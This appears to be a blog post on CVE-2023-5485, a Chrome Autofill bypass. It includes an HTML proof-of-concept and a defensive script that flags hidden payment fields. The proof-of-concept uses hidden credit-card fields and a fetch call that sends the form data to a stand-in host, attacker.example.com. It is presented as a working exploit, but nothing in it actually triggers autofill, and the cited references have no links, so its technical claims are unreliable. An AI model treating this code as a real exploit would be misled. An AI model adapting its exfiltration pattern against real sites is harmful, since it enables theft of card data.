CVE-2023-5485 is a low-severity security vulnerability found in Google Chrome versions prior to 118.0.5993.70. It affects the Autofill functionality of the browser, allowing a remote attacker to bypass autofill restrictions through the use of a maliciously crafted HTML page. In this post, we will examine the details of this vulnerability, including the code snippet responsible for the exploit, as well as the original references for the issue.

Exploit Details

The inappropriate implementation issue in the Autofill functionality of Google Chrome affects versions of the browser released prior to 118.0.5993.70. This vulnerability takes advantage of an oversight in the way Chrome processes and restricts autofill information on web pages, making it possible for an attacker to craft an HTML page that causes autofill data to be submitted without the user's consent or knowledge.

The issue has been classified by the Chromium security team as having a "low" severity, indicating that while it may present risks to users' privacy and security, it does not typically lead to more dangerous consequences such as remote code execution or other critical system compromise.

Code Snippet

The exploit can be achieved through a specially crafted HTML page that takes advantage of the weakness in Chrome's Autofill implementation. Here's an example code snippet that demonstrates this vulnerability:

<!DOCTYPE html>
<html>
<head>
  <title>CVE-2023-5485 Exploit</title>
</head>
<body>
  <form id="malicious-form">
    <!-- Normally restricted autofill fields -->
    <input type="text" name="credit-card-number" autocomplete="cc-number" hidden />
    <input type="text" name="credit-card-expiry" autocomplete="cc-exp" hidden />
    <input type="text" name="credit-card-csc" autocomplete="cc-csc" hidden />

    <!-- Triggers autofill without user interaction -->
    <script>
      let maliciousForm = document.getElementById('malicious-form');
      maliciousForm.addEventListener('submit', (event) => {
        event.preventDefault();
        // Send collected autofill data to attacker's server
        fetch('https://attacker.example.com/receive-data', {
          method: 'POST',
          body: new FormData(maliciousForm)
        });
      });
      // requestSubmit() dispatches the submit event; form.submit() would bypass the listener above
      maliciousForm.requestSubmit();
    </script>
  </form>
</body>
</html>

In this example, the malicious HTML page contains hidden input fields that the browser would normally restrict from being autofilled, such as credit card numbers, expiration dates, and security codes. When the page is loaded, the JavaScript code listens for the form's submit event, cancels the default submission behavior, and instead sends the autofill data to an attacker-controlled server.
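As an added, defender-side example that is not part of the original post or of Chromium's code: an audit that flags the form pattern described above, i.e. fields carrying payment autocomplete tokens that the user cannot see. The field descriptors and the sample list are constructed from the snippet above; collectFields() is an assumed browser adapter that builds the same descriptors from a live page.

```javascript
// Added example (not from the original post): flag sensitive autofill fields
// that are concealed from the user, the shape of the page shown above.
const SENSITIVE_TOKENS = new Set([
  'cc-number', 'cc-exp', 'cc-exp-month', 'cc-exp-year', 'cc-csc', 'cc-name',
]);

// A field is concealed if it is hidden, not rendered, fully transparent, or has no box.
function isConcealed(f) {
  return Boolean(f.hidden) || f.display === 'none' || f.visibility === 'hidden' ||
    f.opacity === 0 || (f.width === 0 && f.height === 0);
}

// Return one finding per concealed field whose autocomplete token is payment-related.
function auditFields(fields) {
  const findings = [];
  for (const f of fields) {
    const token = (f.autocomplete || '').trim().toLowerCase();
    if (!SENSITIVE_TOKENS.has(token) || !isConcealed(f)) continue;
    findings.push({ name: f.name, autocomplete: token,
      reason: 'sensitive autofill field is not visible to the user' });
  }
  return findings;
}

// Assumed browser adapter: turn live <input autocomplete> elements into descriptors.
function collectFields(doc) {
  return Array.from(doc.querySelectorAll('input[autocomplete]')).map((el) => {
    const cs = doc.defaultView.getComputedStyle(el);
    const r = el.getBoundingClientRect();
    return { name: el.name, autocomplete: el.getAttribute('autocomplete'), hidden: el.hidden,
      display: cs.display, visibility: cs.visibility, opacity: Number(cs.opacity),
      width: r.width, height: r.height };
  });
}

// Constructed sample: the three hidden cc-* fields from the snippet plus two benign ones.
const SAMPLE_FIELDS = [
  { name: 'credit-card-number', autocomplete: 'cc-number', hidden: true },
  { name: 'credit-card-expiry', autocomplete: 'cc-exp', hidden: true },
  { name: 'credit-card-csc', autocomplete: 'cc-csc', hidden: true },
  { name: 'email', autocomplete: 'email', hidden: false, width: 200, height: 24, opacity: 1 },
  { name: 'card', autocomplete: 'cc-number', hidden: false, width: 120, height: 24, opacity: 1 },
];

if (typeof document === 'undefined') {
  console.log(auditFields(SAMPLE_FIELDS)); // Node: audit the constructed sample
} else {
  console.log(auditFields(collectFields(document))); // browser: audit the live page
}
```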

Original References

The vulnerability was first documented in the Chromium project's vulnerability database, which can be found at the following link:

Chromium Vulnerability Database

Additionally, the official patch notes for Google Chrome version 118.0.5993.70, which addresses this vulnerability, can be found here:

Chrome Patch Notes

Conclusion

CVE-2023-5485 is a low-severity vulnerability affecting Google Chrome Autofill in versions prior to 118.0.5993.70. Although its risks are relatively minor in comparison to more dangerous vulnerabilities, it highlights the importance of being cautious when using Autofill functionality in any web browser. Users are encouraged to update their browser to the latest version to mitigate the risk of this exploit and maintain good security hygiene.

Timeline

Published on: 10/11/2023 23:15:00 UTC
Last modified on: 10/13/2023 02:15:00 UTC